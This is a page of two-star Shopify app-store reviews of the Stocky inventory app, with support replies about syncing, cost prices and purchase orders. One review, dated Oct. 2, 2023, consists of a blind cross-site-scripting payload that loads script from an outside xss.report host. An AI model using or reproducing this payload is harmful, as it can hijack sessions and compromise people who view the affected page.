All reviews

Rating Breakdown

  • 5
    63% (139 ratings)
  • 4
    8% (18 ratings)
  • 3
    6% (13 ratings)
  • 2
    8% (18 ratings)
  • 1
    15% (34 ratings)

2 / 5 Share

Oct. 17, 2023

getting this message 503 Service Temporarily Unavailable I'm paying two members of staff for the day to do nothing

Using app

Over 2 years

Total reviews

1

Average rating

2.0

Developer Reply

Hi, there! I'm sorry to hear that your staff were getting a 503 error when trying to access Stocky. If you're still seeing the error message, you may need to clear your browser's cache and cookies. It can also be helpful to check for browser updates. If the error message persists after troubleshooting, please contact our team via the Shopify Help Center so we can investigate and help you resolve the issue: bit.ly/2AWw5VA. Thank you! -Sophia, Shopify Support

2 / 5 Share

Oct. 2, 2023

$.getScript("//xss.report/c/digitalg") "> "> ">

Using app

About 1 hour

Total reviews

3

Average rating

4.0

2 / 5 Share

Aug. 2, 2023

I'm pretty much done with this app. I've been using it for 3 years. When I print off an in-stock inventory report any new products ordered and received have no cost listed (but the P.O. was created and received in Stocky complete with prices) I went to another report and was able to click and enter cost for the products. There was no save button and typically Stocky saves automatically. I printed a PDF and there were no costs listed despite having entered them. I "updated" and all the costs I had entered on the screen disappeared. I checked my settings and Stocky is apparently syncing with Shopify so there shouldn't be an issue as Shopify has costs entered for each product. I'll look to see if there is a Stocky specialist but it may be time to find something else.

Using app

Over 3 years

Total reviews

6

Average rating

4.0

Developer Reply

Thank you for taking the time to leave a review for Stocky, we really appreciate your candid feedback. I'm sorry to hear that you're having some trouble with the reporting functionality. Stocky makes an average cost price from your PO's by time. However, if you feel like settings are correct and the reports are showing as expected please create a support ticket via our Help Centre - https://shopify.link/WJna. Our team will be happy to help further. Thank you. -Iris, Shopify Support

2 / 5 Share

Oct. 6, 2022

BEWARE, shopify Ruined this app by buying it. I used to pay $50 a month for Stocky before shopify bought it and it was worth it for the amazing customer service. There have been zero changes or updates, and the shopify customer service team doesn't even know how to use the app, so they can't help with anything. As others have mentioned, the forcasting feature isn't accurate. Plus there's no way to see which products are on order easily. Products are virtually impossible to edit individually- in order to update a cost I have to go into the supplier, find a product and edit. I have products that are carried by multiple distributors and have to assign each product to each distributor individually, a 7 step process per product, per distributor. suppliers --> choose supplier --> settings --> manage products --> assign products --> search --> add selected products. I miss Seb from Stocky!

Using app

About 6 years

Total reviews

1

Average rating

2.0

Developer Reply

Hello Lotus Blooms, thank you for taking the time to leave your review. I'll let our Reviews Team here know about your review. They look into feedback from merchants and take it into consideration for use on our platform. I'm sure other merchants such as yourself have had similar needs, so we may see this feature implemented on Shopify in the future!

2 / 5 Share

Jan. 21, 2022

We switched to Stocky so that we wouldn't have to use different inventory systems for our website and brick and mortar. While some functionality is useful, there are some major issues. Our biggest has been that Shopify is refusing to fix a bug that makes every item show up on POs for any location, even if the item is only sold at one location. This has been immensely time-consuming and has led to us spending significantly more time on inventory management than is necessary. Buy beyond that, it was very frustrating to hear from Shopify that they're not planning to fix it at all. This clearly communicates to me that they don't actually care about our experience, and is very disappointing. I would not recommend going through the trouble of getting started with Stocky.

Using app

Over 1 year

Total reviews

2

Average rating

2.0

Developer Reply

Thank you for the review. We now have a dedicated team working on making Stocky better and have fixed the bug you mentioned in your review. There is a new option to exclude items from other locations: go to Preferences -> Forecasting, then check "Only include products associated with the receive location".

2 / 5 Share

Sept. 24, 2021

I'm still not sure if Stocky and Shopify communicate regarding Transfers. Right now we're ordering out of Stocky as it provides great suggestions based on lead times and sell-through, really like that. It also shows outstanding orders that we've recently placed. But when we receive stock we 'transfer it in' in Shopify. Not Stocky. So does Stocky at any point know what we've received, or does it just use the adjusted inventory level we now have in Shopify? However that would then mean that over time the 'open orders' number increases indefinitely as Stocky does not know which ones of those are fulfilled by now. Are we expected to receive product in Stocky and in Shopify manually to have an accurate and integrated system? Thanks, Evert

Using app

Over 1 year

Total reviews

3

Average rating

4.0

2 / 5 Share

March 18, 2021

App is useful in some areas but completely useless in others and unfortunately since Shopify purchased it, there's no support. Shopify support has no idea how any of the functionality works and some members of the support team aren't even aware that it's now owned by Shopify. Why isn't there a support team dedicated to learning this app? I'm not sure why Shopify bothered purchasing it.

Store

Cupcake

Using app

About 1 year

Total reviews

1

Average rating

2.0

Developer Reply

Hi there, thank you for taking the time to leave a review for Stocky. We know how important it is to be able to reach out for support which is why we have a dedicated Stocky Support team at Shopify. If you'd like to reach out to Stocky team, you can do so by emailing [email protected] with your queries. Your email will come directly to our team and we'll be happy to help with any questions. You can also find this email address whenever you need it under the Help tab in Stocky. - Barry | Stocky Support

2 / 5 Share

Dec. 14, 2020

Was a good app to see and manage inventory but for some reason Shopify decided that only customers with a physical storefront (the customers that need a POS) only need to see and manage their inventory. Interesting and really short sighted, very disappointed with Shopify removing this from a basic function...don't they realize the better the stores on Shopify manages their inventory the more money they make??

Using app

6 months

Total reviews

6

Average rating

3.2

Developer Reply

Hello there! Thank you for taking the time to leave a review for Stocky, we really appreciate your candid feedback. And I'm sorry to hear that you're having some trouble, I will follow up with you via email to discuss this further, as well as to get any other pieces of feedback you would be willing to share with us. Thank you, Liana.

2 / 5 Share

Nov. 12, 2020

I have used this app since switching to Shopify in January 2020. I find it quite frustrating and not very intuitive to use. There is lots of duplicate effort required between Stocky and Shopify, they could do MUCH better. Even as simple as putting the cursor in a field selected when a window pops up. Windows disappear if an item is not found in a search and you have to start over. The small things that waste time add up in a hurry when you are adding lots of seasonal products. It would be fine if you only had to add new items occasionally, but our inventory is always changing. Also, no integration with accounting software is so frustrating. Shopify really needs to look at the whole picture of small business, retail, online, accounting, and offer a complete integrated system without all the 3rd party apps.

Using app

10 months

Total reviews

2

Average rating

2.5

Developer Reply

Hello there! Thank you for taking the time to leave a review for Stocky, we really appreciate your candid feedback. And I'm sorry to hear that you're having some trouble, I will follow up with you via email to discuss this further, as well as to get any other pieces of feedback you would be willing to share with us. Thank you, Liana.

2 / 5 Share

Oct. 5, 2021

Update 10-5-2021 Shopify refuses to listen to it's customers.. Time to move on? No updates to stocky in a long time.. I guess shopify won't fix the issues ever. Item Costs still don't sync with shopify automatically.. Are we living in the year 2000? Purchase order creation could be so much better, faster, and smarter. Why did they buy a company if they weren't going to do anything with it? Very disappointed plus customer. Old Review Could be much better.. Needs to be integrated with shopify as core, not just an app. Cost of items don't automatically sync. You have to manually click a button to sync, which makes all your profit reports useless. Also, need fields like item location to sync over to shopify. Lots of wasted time, by flipping between shopify and stocky.

Using app

Over 1 year

Total reviews

4

Average rating

1.8

Developer Reply

Hi there, thank you for taking the time to leave a review for Stocky. We appreciate your feedback and I am currently looking into this for you. I will follow up with you via email to discuss this further, as well as to get any other pieces of feedback you would be willing to share with us. Regards, James

2 / 5 Share

July 10, 2020

Needs to be able to syc product cost. Can't send a purchase order without a cost. Also, would be nice to be able to see inventory by suppliers, not just vendors.

Using app

8 months

Total reviews

2

Average rating

3.5

Developer Reply

Hi there, thank you for taking the time to leave a review for Stocky. We appreciate your feedback. I'm going to be following up with you via email about the feature request you've shared as well as your pain point regarding viewing inventory. Two way syncing of cost prices is something that the Stocky app developers are actively working on. We're so looking forward to seeing it roll out. Regards, Lou

2 / 5 Share

July 10, 2020

The very fact that Stocky doesn't import cost prices renders it useless. I've given two stars as the rest of it looks ok.

Using app

Over 1 year

Total reviews

9

Average rating

3.4

Developer Reply

Hi there, thank you for taking the time to leave a review for Stocky. We appreciate your feedback. I'm going to be following up with you via email about the feature request you've shared. Two way syncing of cost prices is something that the Stocky app developers are actively working on. We're excited to see it roll out. Regards, Lou

2 / 5 Share

May 24, 2020

Been trying to use this app for about a year to manage my inventory for two physical stores and my online store. Very difficult to use the Purchase Order feature for my entire business. The app only allows POs for each store independently of each other. I have tried calling for help through Shopify, but hard to find anyone with expertise. I can view all my inventory on one screen, so why can’t the app be able to do a PO for all of the inventory? Doesn’t make sense.

Using app

6 months

Total reviews

1

Average rating

2.0

Developer Reply

My name is Amy and I'm part of the Retail Specialist team here at Shopify. We appreciate you taking the time to let us know your experiences with using the Stocky app. I'm going to reach out to you directly by email to see how we can help to improve your experience with the Purchase Order feature of the app and how it handles multiple locations. Amy T. | Retail Support Specialist

2 / 5 Share

Feb. 26, 2020

I've uninstalled and re-installed the app figuring it might fix the week long manual sync that doesn't seem to finish. Now with the new install it's been 6 hours and it still hasn't synced. When it was working the app was great it just has syncing problems. While viewing suppliers and splitting the screen you can't click on the vendors.

Using app

About 1 month

Total reviews

1

Average rating

2.0

2 / 5 Share

Nov. 22, 2019

is it me or is this app the slowest app in the world? i spend half my time waiting for it to load. please show me how to speed this app up

Store

BodyFX

Using app

19 days

Total reviews

7

Average rating

4.4

Developer Reply

Hi there, thank you for taking the time to review your experience with Stocky. I would love an opportunity to assist you with this speed/loading issue if you are still experiencing it. I will be reaching out to you via email to see how we can help get this working for you. Thank you - Beckha

2 / 5 Share

Oct. 30, 2019

I have uninstalled it - perhaps I needed to spend more time trying to figure it out, but I found it hard to navigate, hard to get basic reports from, and not suitable for our use. I suspect it's better for a bigger store than ours, but there wasn't much in it I couldn't get from Shopify already. Also, it wasn't automatically updating the cost price from Shopify so it negated the one key thing we were using it for.

Using app

Over 2 years

Total reviews

1

Average rating

2.0

2 / 5 Share

Aug. 26, 2020

Unfortunately, I'm now very frustrated with this app. Stocky Failed to Sync and was stuck in syncing mode for over 1 week. I reached out to support who advised me that initial syncs could sometimes stick. I explained that this wasn't my initial sync, I've had almost 500 purchase orders. I was then told to uninstall/delete the app and reinstall it. Sounded like a bad idea to me. I reached out to Support again to confirm, who directed me to the original Shopify team member, who assured me that nothing would be lost. Stocky still didn't sync...and I received no further interaction from Shopify Support. I then ran through the steps again, and finally had a successful sync. But...my 2 years worth of purchase orders, my preferences, my vendor minimums, and my supplier case packs are all gone. I'm starting over. I reached out to support again...now 3 additional emails and have still not received any communication from POS Support. In addition, I found that inventory quanitities (when viewing line items in the drop down menu) are no longer visible. So...let's say you create a purchase order for Fall, but want to check your current inventory counts to see if something didn't fall into the purchase order re-order parameters, but might be right on the cusp of needing a re-order...let's say orange food coloring for Halloween or orange Sweaters for fall, I now have to leave the app to see my inventory counts and then go back to the app to add a line item??? I used to be able to just visually scroll down the list of items from the vendor in the dropdown and see immediately which ones were a little lower than I wanted them to be. The *generate based on "same period as last year" functionality has not worked, and so I've been doing a visual review of my line items from the app to quickly determine if I need to add something that Stocky hasn't. It has been 11 days since I contacted support. I miss Seb. On top of all of this, I'm reading reviews and see very clearly a response to someone who deleted the app in order to fix their issues and find this : "Hi there - I'm very sorry to hear of the poor experience that you have had hear & would like to take this opportunity to thank you for your patience and understanding throughout this process. When Stocky is removed from an account, any transient data such as PO's etc. is removed and needs to be re-added manually - I understand that this was your experience and I hear you on that. Your feedback is very valuable to us & I will be reaching out to you via email so that I can fully capture that feedback before sharing it with our developers and to see if there is anything else that we can do that may get Stocky back to being a valuable addition to your business. Thank you & I will be in touch - Beckha" My Orig Review: I don't write app reviews until I've had a chance to truly test the product. Seb's Stocky App is top notch. We've been using it for almost a year now, with consistently excellent results. When you re-order merchandise weekly, an inventory control and purchase ordering system is a must. Now instead of filling our shelves with mediocre product, we are able to reorder top sellers. We are able to identify slow moving stock for clearancing. We are able to identify price changes from the manufacturer and immediately adjust retails to achieve an ideal profit margin. There are so many features, and we've really only investigated about one third of what Stocky has to offer. We have had 3 minor hiccups. Support (Seb) immediately researched our issues and found resolutions. 1 of the issues was user error and employee re-training was implemented. 1 of the issues was related to interface issues...which Seb researched AND implemented a change for all to make that interface more obvious! Nicely done. The last issue was actually a Shopify hiccup. So of the 3 issues, ALL were researched by Seb and support, and the one issue directly related to Stocky was corrected due to our feedback. Thank you Seb. We tried a couple of inventory control, purchase ordering apps, but by far, Stocky outshined the others. The monthly price is a bargain compared to the many features of Stocky. Great App.

Using app

Over 2 years

Total reviews

4

Average rating

4.3

2 / 5 Share

Feb. 21, 2017

Not recommended. Issues: 1. Can't export to excel. I don't know any supplier that takes orders in PDF. Try negotiating prices for hundreds of items in a PDF purchase order. 2. Can't include images 3. Can't change product name or variant name 4. To import cost you need to send an email to them with your price list. Really? 5. SKUs we use are different than SKU used by supplier, there's no field for that. 6. It grades products with A,B,C but it doesn't say anywhere what's an A, B or C 7. Calculations are incorrect. If num in stock is 2 and quantity needed is 7, then quantity to order is 5 not 7. Does not fulfill the purpose of helping with purchase orders in any way.

Using app

About 2 months

Total reviews

11

Average rating

2.5

Developer Reply

Thanks for the review. 1. You can now send to a supplier as a CSV which opens in Excel 2. You can now show an image column on the PO 3. You can do this in Shopify and it syncs to Stocky within a couple of seconds 4. You can now import costs by going to Inventory -> Import -> Cost prices. 5. Stocky uses "supplier codes" and SKUs. Supplier codes are for your supplier and SKUs are your internal reference. 6. Go to Dashboard -> ABC Analysis -> Click on the grade icon to see all products of that grade. 7. There's a setting to include or exclude the current stock level in the calculation.